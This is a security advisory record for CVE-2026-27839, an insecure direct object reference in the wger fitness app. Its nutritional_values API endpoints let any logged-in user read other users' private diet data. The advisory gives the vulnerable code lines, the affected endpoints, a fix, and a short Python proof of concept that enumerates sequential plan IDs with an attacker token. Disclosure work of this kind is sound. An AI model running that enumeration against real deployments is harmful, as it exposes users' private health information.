GHSA-g8gc-6c4h-jg86

Source

https://github.com/advisories/GHSA-g8gc-6c4h-jg86

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-g8gc-6c4h-jg86/GHSA-g8gc-6c4h-jg86.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-g8gc-6c4h-jg86

Aliases

CVE-2026-27839

Published

2026-02-26T22:15:51Z

Modified

2026-02-27T01:05:11.203011Z

Severity

4.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N CVSS Calculator

Summary

wger: IDOR in nutritional_values endpoints exposes private dietary data via direct ORM lookup

Details

Summary

Three nutritional_values action endpoints fetch objects via Model.objects.get(pk=pk) — a raw ORM call that bypasses the user-scoped queryset. Any authenticated user can read another user's private nutrition plan data, including caloric intake and full macro breakdown, by supplying an arbitrary PK.

Details

DRF detail actions do not automatically apply queryset filtering — the action must call self.get_object() to enforce object-level permissions. These three endpoints skip that and go directly to the ORM:

wger/nutrition/api/views.py:

# line 301 — NutritionPlanViewSet
plan = NutritionPlan.objects.get(pk=pk)           # VULNERABLE — no user check

# line 356 — MealViewSet
meal = Meal.objects.get(pk=pk)                    # VULNERABLE

# line 403 — MealItemViewSet
meal_item = MealItem.objects.get(pk=pk)           # VULNERABLE

The correct pattern used in the same file at LogItemViewSet (line 438):

LogItem.objects.get(pk=pk, plan__user=self.request.user)  # CORRECT

Affected endpoints:

GET /api/v2/nutritionplan/{pk}/nutritional_values/
GET /api/v2/meal/{pk}/nutritional_values/
GET /api/v2/mealitem/{pk}/nutritional_values/

PoC

import requests

BASE = "http://localhost"
# Attacker's token (any registered user)
headers = {"Authorization": "Token ATTACKER_TOKEN"}

# Read victim's nutrition plan — enumerate pk starting from 1
for pk in range(1, 100):
    r = requests.get(
        f"{BASE}/api/v2/nutritionplan/{pk}/nutritional_values/",
        headers=headers
    )
    if r.status_code == 200:
        data = r.json()
        print(f"Plan {pk}: {data}")
        # Returns: energy (kcal), protein, carbohydrates, carbohydrates_sugar,
        #          fat, fat_saturated, fiber, sodium

No interaction from the victim required. Registration is open by default. PKs are sequential integers.

Impact

Any authenticated user can read other users' private dietary and health data: - Daily caloric intake - Protein, carbohydrate, fat, fiber, and sodium intake - Full meal composition and ingredient quantities

This data is sensitive health information users expect to be private.

Fix: Replace direct ORM calls with self.get_object(), which applies the viewset's user-scoped queryset and object-level permissions automatically. Or add an explicit user filter: NutritionPlan.objects.get(pk=pk, user=self.request.user).

Database specific

{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-02-26T22:15:51Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-639"
    ]
}

References

Affected packages

PyPI / wger

Package

Name: wger; View open source insights on deps.dev
Purl: pkg:pypi/wger

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Last affected

2.1

Affected versions

1.*

1.1

1.1.1

1.2rc1

1.2

1.3

1.4

1.5

1.6

1.6.1

1.7

1.8

1.9

2.*

2.0

2.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-g8gc-6c4h-jg86/GHSA-g8gc-6c4h-jg86.json"